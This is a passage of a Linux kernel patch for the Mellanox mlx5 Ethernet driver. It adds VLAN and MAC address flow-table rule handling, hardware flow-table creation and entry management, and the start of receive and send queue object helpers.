MLX5_SET(fte_match_param, match_value, outer_headers.vlan_tag, + 1); + break; + default: /* MLX5E_VLAN_RULE_TYPE_MATCH_VID */ + ft_ix = &priv->vlan.active_vlans_ft_ix[vid]; + MLX5_SET(fte_match_param, match_value, outer_headers.vlan_tag, + 1); + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.first_vid); + MLX5_SET(fte_match_param, match_value, outer_headers.first_vid, + vid); + break; + } + + err = mlx5_add_flow_table_entry(priv->ft.vlan, match_criteria_enable, + match_criteria, flow_context, ft_ix); + if (err) + netdev_err(priv->netdev, "%s: failed\n", __func__); + +add_vlan_rule_out: + kvfree(match_criteria); + kvfree(flow_context); + return err; +} + +static void mlx5e_del_vlan_rule(struct mlx5e_priv *priv, + enum mlx5e_vlan_rule_type rule_type, u16 vid) +{ + switch (rule_type) { + case MLX5E_VLAN_RULE_TYPE_UNTAGGED: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.untagged_rule_ft_ix); + break; + case MLX5E_VLAN_RULE_TYPE_ANY_VID: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.any_vlan_rule_ft_ix); + break; + case MLX5E_VLAN_RULE_TYPE_MATCH_VID: + mlx5_del_flow_table_entry(priv->ft.vlan, + priv->vlan.active_vlans_ft_ix[vid]); + break; + } +} + +void mlx5e_enable_vlan_filter(struct mlx5e_priv *priv) +{ + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + if (priv->vlan.filter_disabled) { + priv->vlan.filter_disabled = false; + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + } +} + +void mlx5e_disable_vlan_filter(struct mlx5e_priv *priv) +{ + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + if (!priv->vlan.filter_disabled) { + priv->vlan.filter_disabled = true; + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + } +} + +int mlx5e_vlan_rx_add_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int err = 0; + + mutex_lock(&priv->state_lock); + + set_bit(vid, priv->vlan.active_vlans); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, + vid); + + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_vlan_rx_kill_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + mutex_lock(&priv->state_lock); + + clear_bit(vid, priv->vlan.active_vlans); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, vid); + + mutex_unlock(&priv->state_lock); + + return 0; +} + +int mlx5e_add_all_vlan_rules(struct mlx5e_priv *priv) +{ + u16 vid; + int err; + + for_each_set_bit(vid, priv->vlan.active_vlans, VLAN_N_VID) { + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, + vid); + if (err) + return err; + } + + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_UNTAGGED, 0); + if (err) + return err; + + if (priv->vlan.filter_disabled) { + err = mlx5e_add_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, + 0); + if (err) + return err; + } + + return 0; +} + +void mlx5e_del_all_vlan_rules(struct mlx5e_priv *priv) +{ + u16 vid; + + if (priv->vlan.filter_disabled) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_ANY_VID, 0); + + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_UNTAGGED, 0); + + for_each_set_bit(vid, priv->vlan.active_vlans, VLAN_N_VID) + mlx5e_del_vlan_rule(priv, MLX5E_VLAN_RULE_TYPE_MATCH_VID, vid); +} + +#define mlx5e_for_each_hash_node(hn, tmp, hash, i) \ + for (i 
= 0; i < MLX5E_ETH_ADDR_HASH_SIZE; i++) \ + hlist_for_each_entry_safe(hn, tmp, &hash[i], hlist) + +static void mlx5e_execute_action(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_hash_node *hn) +{ + switch (hn->action) { + case MLX5E_ACTION_ADD: + mlx5e_add_eth_addr_rule(priv, &hn->ai, MLX5E_FULLMATCH); + hn->action = MLX5E_ACTION_NONE; + break; + + case MLX5E_ACTION_DEL: + mlx5e_del_eth_addr_from_flow_table(priv, &hn->ai); + mlx5e_del_eth_addr_from_hash(hn); + break; + } +} + +static void mlx5e_sync_netdev_addr(struct mlx5e_priv *priv) +{ + struct net_device *netdev = priv->netdev; + struct netdev_hw_addr *ha; + + netif_addr_lock_bh(netdev); + + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_uc, + priv->netdev->dev_addr); + + netdev_for_each_uc_addr(ha, netdev) + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_uc, ha->addr); + + netdev_for_each_mc_addr(ha, netdev) + mlx5e_add_eth_addr_to_hash(priv->eth_addr.netdev_mc, ha->addr); + + netif_addr_unlock_bh(netdev); +} + +static void mlx5e_apply_netdev_addr(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_hash_node *hn; + struct hlist_node *tmp; + int i; + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_uc, i) + mlx5e_execute_action(priv, hn); + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_mc, i) + mlx5e_execute_action(priv, hn); +} + +static void mlx5e_handle_netdev_addr(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_hash_node *hn; + struct hlist_node *tmp; + int i; + + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_uc, i) + hn->action = MLX5E_ACTION_DEL; + mlx5e_for_each_hash_node(hn, tmp, priv->eth_addr.netdev_mc, i) + hn->action = MLX5E_ACTION_DEL; + + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_sync_netdev_addr(priv); + + mlx5e_apply_netdev_addr(priv); +} + +void mlx5e_set_rx_mode_core(struct mlx5e_priv *priv) +{ + struct mlx5e_eth_addr_db *ea = &priv->eth_addr; + struct net_device *ndev = priv->netdev; + + bool rx_mode_enable = test_bit(MLX5E_STATE_OPENED, &priv->state); + bool promisc_enabled = rx_mode_enable && (ndev->flags & IFF_PROMISC); + bool allmulti_enabled = rx_mode_enable && (ndev->flags & IFF_ALLMULTI); + bool broadcast_enabled = rx_mode_enable; + + bool enable_promisc = !ea->promisc_enabled && promisc_enabled; + bool disable_promisc = ea->promisc_enabled && !promisc_enabled; + bool enable_allmulti = !ea->allmulti_enabled && allmulti_enabled; + bool disable_allmulti = ea->allmulti_enabled && !allmulti_enabled; + bool enable_broadcast = !ea->broadcast_enabled && broadcast_enabled; + bool disable_broadcast = ea->broadcast_enabled && !broadcast_enabled; + + if (enable_promisc) + mlx5e_add_eth_addr_rule(priv, &ea->promisc, MLX5E_PROMISC); + if (enable_allmulti) + mlx5e_add_eth_addr_rule(priv, &ea->allmulti, MLX5E_ALLMULTI); + if (enable_broadcast) + mlx5e_add_eth_addr_rule(priv, &ea->broadcast, MLX5E_FULLMATCH); + + mlx5e_handle_netdev_addr(priv); + + if (disable_broadcast) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->broadcast); + if (disable_allmulti) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->allmulti); + if (disable_promisc) + mlx5e_del_eth_addr_from_flow_table(priv, &ea->promisc); + + ea->promisc_enabled = promisc_enabled; + ea->allmulti_enabled = allmulti_enabled; + ea->broadcast_enabled = broadcast_enabled; +} + +void mlx5e_set_rx_mode_work(struct work_struct *work) +{ + struct mlx5e_priv *priv = container_of(work, struct mlx5e_priv, + set_rx_mode_work); + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + 
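		/*
		 * Annotation (not in the original patch): the requested rx
		 * mode is recomputed under state_lock and pushed to the
		 * hardware only while the netdev is open, so this work item
		 * serializes with the open/close paths that take the same
		 * lock.
		 */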
mlx5e_set_rx_mode_core(priv); + mutex_unlock(&priv->state_lock); +} + +void mlx5e_init_eth_addr(struct mlx5e_priv *priv) +{ + ether_addr_copy(priv->eth_addr.broadcast.addr, priv->netdev->broadcast); +} + +static int mlx5e_create_main_flow_table(struct mlx5e_priv *priv) +{ + struct mlx5_flow_table_group *g; + u8 *dmac; + + g = kcalloc(9, sizeof(*g), GFP_KERNEL); + + g[0].log_sz = 2; + g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.ip_protocol); + + g[1].log_sz = 1; + g[1].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[1].match_criteria, + outer_headers.ethertype); + + g[2].log_sz = 0; + + g[3].log_sz = 14; + g[3].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[3].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + MLX5_SET_TO_ONES(fte_match_param, g[3].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[3].match_criteria, + outer_headers.ip_protocol); + + g[4].log_sz = 13; + g[4].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[4].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + MLX5_SET_TO_ONES(fte_match_param, g[4].match_criteria, + outer_headers.ethertype); + + g[5].log_sz = 11; + g[5].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[5].match_criteria, + outer_headers.dmac_47_16); + memset(dmac, 0xff, ETH_ALEN); + + g[6].log_sz = 2; + g[6].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[6].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + MLX5_SET_TO_ONES(fte_match_param, g[6].match_criteria, + outer_headers.ethertype); + MLX5_SET_TO_ONES(fte_match_param, g[6].match_criteria, + outer_headers.ip_protocol); + + g[7].log_sz = 1; + g[7].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[7].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + MLX5_SET_TO_ONES(fte_match_param, g[7].match_criteria, + outer_headers.ethertype); + + g[8].log_sz = 0; + g[8].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + dmac = MLX5_ADDR_OF(fte_match_param, g[8].match_criteria, + outer_headers.dmac_47_16); + dmac[0] = 0x01; + priv->ft.main = mlx5_create_flow_table(priv->mdev, 1, + MLX5_FLOW_TABLE_TYPE_NIC_RCV, + 9, g); + kfree(g); + + return priv->ft.main ? 0 : -ENOMEM; +} + +static void mlx5e_destroy_main_flow_table(struct mlx5e_priv *priv) +{ + mlx5_destroy_flow_table(priv->ft.main); +} + +static int mlx5e_create_vlan_flow_table(struct mlx5e_priv *priv) +{ + struct mlx5_flow_table_group *g; + + g = kcalloc(2, sizeof(*g), GFP_KERNEL); + if (!g) + return -ENOMEM; + + g[0].log_sz = 12; + g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.vlan_tag); + MLX5_SET_TO_ONES(fte_match_param, g[0].match_criteria, + outer_headers.first_vid); + + /* untagged + any vlan id */ + g[1].log_sz = 1; + g[1].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, g[1].match_criteria, + outer_headers.vlan_tag); + + priv->ft.vlan = mlx5_create_flow_table(priv->mdev, 0, + MLX5_FLOW_TABLE_TYPE_NIC_RCV, + 2, g); + + kfree(g); + return priv->ft.vlan ? 
0 : -ENOMEM; +} + +static void mlx5e_destroy_vlan_flow_table(struct mlx5e_priv *priv) +{ + mlx5_destroy_flow_table(priv->ft.vlan); +} + +int mlx5e_open_flow_table(struct mlx5e_priv *priv) +{ + int err; + + err = mlx5e_create_main_flow_table(priv); + if (err) + return err; + + err = mlx5e_create_vlan_flow_table(priv); + if (err) + goto err_destroy_main_flow_table; + + return 0; + +err_destroy_main_flow_table: + mlx5e_destroy_main_flow_table(priv); + + return err; +} + +void mlx5e_close_flow_table(struct mlx5e_priv *priv) +{ + mlx5e_destroy_vlan_flow_table(priv); + mlx5e_destroy_main_flow_table(priv); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c new file mode 100644 index 000000000000..ca90b9bc3b95 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/flow_table.c @@ -0,0 +1,422 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include +#include +#include +#include "mlx5_core.h" + +struct mlx5_ftg { + struct mlx5_flow_table_group g; + u32 id; + u32 start_ix; +}; + +struct mlx5_flow_table { + struct mlx5_core_dev *dev; + u8 level; + u8 type; + u32 id; + struct mutex mutex; /* sync bitmap alloc */ + u16 num_groups; + struct mlx5_ftg *group; + unsigned long *bitmap; + u32 size; +}; + +static int mlx5_set_flow_entry_cmd(struct mlx5_flow_table *ft, u32 group_ix, + u32 flow_index, void *flow_context) +{ + u32 out[MLX5_ST_SZ_DW(set_fte_out)]; + u32 *in; + void *in_flow_context; + int fcdls = + MLX5_GET(flow_context, flow_context, destination_list_size) * + MLX5_ST_SZ_BYTES(dest_format_struct); + int inlen = MLX5_ST_SZ_BYTES(set_fte_in) + fcdls; + int err; + + in = mlx5_vzalloc(inlen); + if (!in) { + mlx5_core_warn(ft->dev, "failed to allocate inbox\n"); + return -ENOMEM; + } + + MLX5_SET(set_fte_in, in, table_type, ft->type); + MLX5_SET(set_fte_in, in, table_id, ft->id); + MLX5_SET(set_fte_in, in, flow_index, flow_index); + MLX5_SET(set_fte_in, in, opcode, MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY); + + in_flow_context = MLX5_ADDR_OF(set_fte_in, in, flow_context); + memcpy(in_flow_context, flow_context, + MLX5_ST_SZ_BYTES(flow_context) + fcdls); + + MLX5_SET(flow_context, in_flow_context, group_id, + ft->group[group_ix].id); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(ft->dev, in, inlen, out, + sizeof(out)); + kvfree(in); + + return err; +} + +static void mlx5_del_flow_entry_cmd(struct mlx5_flow_table *ft, u32 flow_index) +{ + u32 in[MLX5_ST_SZ_DW(delete_fte_in)]; + u32 out[MLX5_ST_SZ_DW(delete_fte_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFTEI(p, x, v) MLX5_SET(delete_fte_in, p, x, v) + MLX5_SET_DFTEI(in, table_type, ft->type); + MLX5_SET_DFTEI(in, table_id, ft->id); + MLX5_SET_DFTEI(in, flow_index, flow_index); + MLX5_SET_DFTEI(in, opcode, MLX5_CMD_OP_DELETE_FLOW_TABLE_ENTRY); + + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static void mlx5_destroy_flow_group_cmd(struct mlx5_flow_table *ft, int i) +{ + u32 in[MLX5_ST_SZ_DW(destroy_flow_group_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_flow_group_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFGI(p, x, v) MLX5_SET(destroy_flow_group_in, p, x, v) + MLX5_SET_DFGI(in, table_type, ft->type); + MLX5_SET_DFGI(in, table_id, ft->id); + MLX5_SET_DFGI(in, opcode, MLX5_CMD_OP_DESTROY_FLOW_GROUP); + MLX5_SET_DFGI(in, group_id, ft->group[i].id); + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static int mlx5_create_flow_group_cmd(struct mlx5_flow_table *ft, int i) +{ + u32 out[MLX5_ST_SZ_DW(create_flow_group_out)]; + u32 *in; + void *in_match_criteria; + int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in); + struct mlx5_flow_table_group *g = &ft->group[i].g; + u32 start_ix = ft->group[i].start_ix; + u32 end_ix = start_ix + (1 << g->log_sz) - 1; + int err; + + in = mlx5_vzalloc(inlen); + if (!in) { + mlx5_core_warn(ft->dev, "failed to allocate inbox\n"); + return -ENOMEM; + } + in_match_criteria = MLX5_ADDR_OF(create_flow_group_in, in, + match_criteria); + + memset(out, 0, sizeof(out)); + +#define MLX5_SET_CFGI(p, x, v) MLX5_SET(create_flow_group_in, p, x, v) + MLX5_SET_CFGI(in, table_type, ft->type); + MLX5_SET_CFGI(in, table_id, ft->id); + MLX5_SET_CFGI(in, opcode, MLX5_CMD_OP_CREATE_FLOW_GROUP); + MLX5_SET_CFGI(in, start_flow_index, start_ix); + MLX5_SET_CFGI(in, end_flow_index, end_ix); + MLX5_SET_CFGI(in, 
match_criteria_enable, g->match_criteria_enable); + + memcpy(in_match_criteria, g->match_criteria, + MLX5_ST_SZ_BYTES(fte_match_param)); + + err = mlx5_cmd_exec_check_status(ft->dev, in, inlen, out, + sizeof(out)); + if (!err) + ft->group[i].id = MLX5_GET(create_flow_group_out, out, + group_id); + + kvfree(in); + + return err; +} + +static void mlx5_destroy_flow_table_groups(struct mlx5_flow_table *ft) +{ + int i; + + for (i = 0; i < ft->num_groups; i++) + mlx5_destroy_flow_group_cmd(ft, i); +} + +static int mlx5_create_flow_table_groups(struct mlx5_flow_table *ft) +{ + int err; + int i; + + for (i = 0; i < ft->num_groups; i++) { + err = mlx5_create_flow_group_cmd(ft, i); + if (err) + goto err_destroy_flow_table_groups; + } + + return 0; + +err_destroy_flow_table_groups: + for (i--; i >= 0; i--) + mlx5_destroy_flow_group_cmd(ft, i); + + return err; +} + +static int mlx5_create_flow_table_cmd(struct mlx5_flow_table *ft) +{ + u32 in[MLX5_ST_SZ_DW(create_flow_table_in)]; + u32 out[MLX5_ST_SZ_DW(create_flow_table_out)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(create_flow_table_in, in, table_type, ft->type); + MLX5_SET(create_flow_table_in, in, level, ft->level); + MLX5_SET(create_flow_table_in, in, log_size, order_base_2(ft->size)); + + MLX5_SET(create_flow_table_in, in, opcode, + MLX5_CMD_OP_CREATE_FLOW_TABLE); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, + sizeof(out)); + if (err) + return err; + + ft->id = MLX5_GET(create_flow_table_out, out, table_id); + + return 0; +} + +static void mlx5_destroy_flow_table_cmd(struct mlx5_flow_table *ft) +{ + u32 in[MLX5_ST_SZ_DW(destroy_flow_table_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_flow_table_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + +#define MLX5_SET_DFTI(p, x, v) MLX5_SET(destroy_flow_table_in, p, x, v) + MLX5_SET_DFTI(in, table_type, ft->type); + MLX5_SET_DFTI(in, table_id, ft->id); + MLX5_SET_DFTI(in, opcode, MLX5_CMD_OP_DESTROY_FLOW_TABLE); + + mlx5_cmd_exec_check_status(ft->dev, in, sizeof(in), out, sizeof(out)); +} + +static int mlx5_find_group(struct mlx5_flow_table *ft, u8 match_criteria_enable, + u32 *match_criteria, int *group_ix) +{ + void *mc_outer = MLX5_ADDR_OF(fte_match_param, match_criteria, + outer_headers); + void *mc_misc = MLX5_ADDR_OF(fte_match_param, match_criteria, + misc_parameters); + void *mc_inner = MLX5_ADDR_OF(fte_match_param, match_criteria, + inner_headers); + int mc_outer_sz = MLX5_ST_SZ_BYTES(fte_match_set_lyr_2_4); + int mc_misc_sz = MLX5_ST_SZ_BYTES(fte_match_set_misc); + int mc_inner_sz = MLX5_ST_SZ_BYTES(fte_match_set_lyr_2_4); + int i; + + for (i = 0; i < ft->num_groups; i++) { + struct mlx5_flow_table_group *g = &ft->group[i].g; + void *gmc_outer = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + outer_headers); + void *gmc_misc = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + misc_parameters); + void *gmc_inner = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + inner_headers); + + if (g->match_criteria_enable != match_criteria_enable) + continue; + + if (match_criteria_enable & MLX5_MATCH_OUTER_HEADERS) + if (memcmp(mc_outer, gmc_outer, mc_outer_sz)) + continue; + + if (match_criteria_enable & MLX5_MATCH_MISC_PARAMETERS) + if (memcmp(mc_misc, gmc_misc, mc_misc_sz)) + continue; + + if (match_criteria_enable & MLX5_MATCH_INNER_HEADERS) + if (memcmp(mc_inner, gmc_inner, mc_inner_sz)) + continue; + + *group_ix = i; + return 0; + } + + return -EINVAL; +} + +static int alloc_flow_index(struct mlx5_flow_table 
*ft, int group_ix, u32 *ix) +{ + struct mlx5_ftg *g = &ft->group[group_ix]; + int err = 0; + + mutex_lock(&ft->mutex); + + *ix = find_next_zero_bit(ft->bitmap, ft->size, g->start_ix); + if (*ix >= (g->start_ix + (1 << g->g.log_sz))) + err = -ENOSPC; + else + __set_bit(*ix, ft->bitmap); + + mutex_unlock(&ft->mutex); + + return err; +} + +static void mlx5_free_flow_index(struct mlx5_flow_table *ft, u32 ix) +{ + __clear_bit(ix, ft->bitmap); +} + +int mlx5_add_flow_table_entry(void *flow_table, u8 match_criteria_enable, + void *match_criteria, void *flow_context, + u32 *flow_index) +{ + struct mlx5_flow_table *ft = flow_table; + int group_ix; + int err; + + err = mlx5_find_group(ft, match_criteria_enable, match_criteria, + &group_ix); + if (err) { + mlx5_core_warn(ft->dev, "mlx5_find_group failed\n"); + return err; + } + + err = alloc_flow_index(ft, group_ix, flow_index); + if (err) { + mlx5_core_warn(ft->dev, "alloc_flow_index failed\n"); + return err; + } + + return mlx5_set_flow_entry_cmd(ft, group_ix, *flow_index, flow_context); +} +EXPORT_SYMBOL(mlx5_add_flow_table_entry); + +void mlx5_del_flow_table_entry(void *flow_table, u32 flow_index) +{ + struct mlx5_flow_table *ft = flow_table; + + mlx5_del_flow_entry_cmd(ft, flow_index); + mlx5_free_flow_index(ft, flow_index); +} +EXPORT_SYMBOL(mlx5_del_flow_table_entry); + +void *mlx5_create_flow_table(struct mlx5_core_dev *dev, u8 level, u8 table_type, + u16 num_groups, + struct mlx5_flow_table_group *group) +{ + struct mlx5_flow_table *ft; + u32 start_ix = 0; + u32 ft_size = 0; + void *gr; + void *bm; + int err; + int i; + + for (i = 0; i < num_groups; i++) + ft_size += (1 << group[i].log_sz); + + ft = kzalloc(sizeof(*ft), GFP_KERNEL); + gr = kcalloc(num_groups, sizeof(struct mlx5_ftg), GFP_KERNEL); + bm = kcalloc(BITS_TO_LONGS(ft_size), sizeof(uintptr_t), GFP_KERNEL); + if (!ft || !gr || !bm) + goto err_free_ft; + + ft->group = gr; + ft->bitmap = bm; + ft->num_groups = num_groups; + ft->level = level; + ft->type = table_type; + ft->size = ft_size; + ft->dev = dev; + mutex_init(&ft->mutex); + + for (i = 0; i < ft->num_groups; i++) { + memcpy(&ft->group[i].g, &group[i], sizeof(*group)); + ft->group[i].start_ix = start_ix; + start_ix += 1 << group[i].log_sz; + } + + err = mlx5_create_flow_table_cmd(ft); + if (err) + goto err_free_ft; + + err = mlx5_create_flow_table_groups(ft); + if (err) + goto err_destroy_flow_table_cmd; + + return ft; + +err_destroy_flow_table_cmd: + mlx5_destroy_flow_table_cmd(ft); + +err_free_ft: + mlx5_core_warn(dev, "failed to alloc flow table\n"); + kfree(bm); + kfree(gr); + kfree(ft); + + return NULL; +} +EXPORT_SYMBOL(mlx5_create_flow_table); + +void mlx5_destroy_flow_table(void *flow_table) +{ + struct mlx5_flow_table *ft = flow_table; + + mlx5_destroy_flow_table_groups(ft); + mlx5_destroy_flow_table_cmd(ft); + kfree(ft->bitmap); + kfree(ft->group); + kfree(ft); +} +EXPORT_SYMBOL(mlx5_destroy_flow_table); + +u32 mlx5_get_flow_table_id(void *flow_table) +{ + struct mlx5_flow_table *ft = flow_table; + + return ft->id; +} +EXPORT_SYMBOL(mlx5_get_flow_table_id); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c new file mode 100644 index 000000000000..3c555d708af1 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -0,0 +1,169 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. 
You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include "mlx5_core.h" +#include "transobj.h" + +int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) +{ + u32 out[MLX5_ST_SZ_DW(create_rq_out)]; + int err; + + MLX5_SET(create_rq_in, in, opcode, MLX5_CMD_OP_CREATE_RQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *rqn = MLX5_GET(create_rq_out, out, rqn); + + return err; +} + +int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_rq_out)]; + + MLX5_SET(modify_rq_in, in, rqn, rqn); + MLX5_SET(modify_rq_in, in, opcode, MLX5_CMD_OP_MODIFY_RQ); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rq_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rq_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rq_in, in, opcode, MLX5_CMD_OP_DESTROY_RQ); + MLX5_SET(destroy_rq_in, in, rqn, rqn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) +{ + u32 out[MLX5_ST_SZ_DW(create_sq_out)]; + int err; + + MLX5_SET(create_sq_in, in, opcode, MLX5_CMD_OP_CREATE_SQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *sqn = MLX5_GET(create_sq_out, out, sqn); + + return err; +} + +int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_sq_out)]; + + MLX5_SET(modify_sq_in, in, sqn, sqn); + MLX5_SET(modify_sq_in, in, opcode, MLX5_CMD_OP_MODIFY_SQ); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_sq_in)]; + u32 